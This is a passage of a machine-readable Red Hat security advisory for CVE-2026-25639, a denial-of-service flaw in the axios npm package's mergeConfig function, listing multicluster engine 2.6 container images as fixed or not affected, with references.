2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2438237"}], "notes": [{"category": "description", "text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.", "title": "Vulnerability description"}, {"category": "summary", "text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"], "known_not_affected": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25639"}, {"category": "external", "summary": "RHBZ#2438237", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"}, {"category": "external", "summary": 